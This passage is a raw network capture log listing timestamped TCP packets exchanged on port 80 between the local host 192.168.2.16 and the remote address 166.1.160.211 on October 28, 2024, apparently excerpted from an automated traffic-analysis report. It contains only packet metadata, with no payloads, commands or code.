                                                                                                                                                              Oct 28, 2024 19:46:21.990560055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.990567923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.990890026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.990936995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.990938902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.990988970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991023064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991034031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991058111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991092920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991111040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991127968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991162062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991177082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991197109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991250038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991251945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991288900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991343975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991347075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991378069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991425991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991436005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991472006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991504908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991514921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991559029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991592884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991605043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991627932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991661072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991672039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991695881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991729021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991748095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991764069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991812944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991812944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991847992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991882086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991899967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991915941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991950989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.991962910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.991988897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992032051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992280960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992316008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992348909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992366076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992384911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992433071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992590904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992625952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992659092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992672920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992693901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992728949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992737055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992933035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992965937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992975950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993000984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993035078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993042946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993069887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993103027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993135929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993138075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993170977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993182898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993207932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993244886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993253946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993442059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993475914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993490934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993510962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993546009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993558884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993597984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993642092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993649960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993686914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993720055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993732929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993753910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993788004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993798971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993823051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993858099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993871927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993907928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993941069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993949890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993976116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994009972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994020939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994231939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994270086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994286060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994389057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994421959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994443893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994472980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994508028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994523048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994541883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994575977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994592905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994610071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994643927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994661093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994678020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994710922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994726896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994745016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994777918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994796038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994812965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994848013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994863987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994884014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994934082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995191097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995224953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995259047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995270967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995295048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995346069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995381117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995434046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995469093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995480061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995501995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995537043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995547056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995789051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995822906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995836973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995857000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995891094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995906115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995939970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995974064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995994091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996009111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996042967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996057987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996078968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996114969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996125937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996273994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996310949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996321917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996346951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996381044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996398926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996695042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996730089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996752024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996763945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996798992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996814013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996831894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996866941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996882915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996901035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996934891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996946096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996968985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997001886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997015953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997036934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997070074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997102976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997107983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997149944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997149944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997263908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997314930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997315884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997349024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997383118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997390985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997422934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997457027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997474909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997490883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997524977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997535944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997560978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997612953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.204732895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.210632086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210757971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210813046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210819006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.210850000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210885048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210896015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.210926056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.210983038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211000919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211054087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211087942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211112022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211122990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211158037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211169004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211193085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211230040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211244106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211266041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211299896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211321115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211359978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211405039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211407900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211438894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211476088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211483955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211565971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211601019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211613894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211636066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211672068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211680889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.211934090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211967945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.211988926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212002039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212037086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212052107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212073088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212106943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212116003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212141991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212179899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212187052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212214947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212248087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212260962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212286949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212321043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212332964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212356091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212389946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212399006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212426901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212467909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212625980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212660074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212696075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212706089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212728977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212764025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212773085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212796926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212842941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212848902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212882996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212918043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212927103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.212953091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212986946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.212995052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213022947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213066101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213248968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213284969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213319063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213327885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213352919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213386059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213397026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213422060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213454962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213465929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213491917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213526011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213536024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213560104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213596106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213608027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213628054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213664055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213674068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213804960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213839054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213851929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213872910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213907003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213916063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.213942051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213974953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.213984013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.265168905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.303508997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.309633017 CET8049726166.1.160.211192.168.2.16
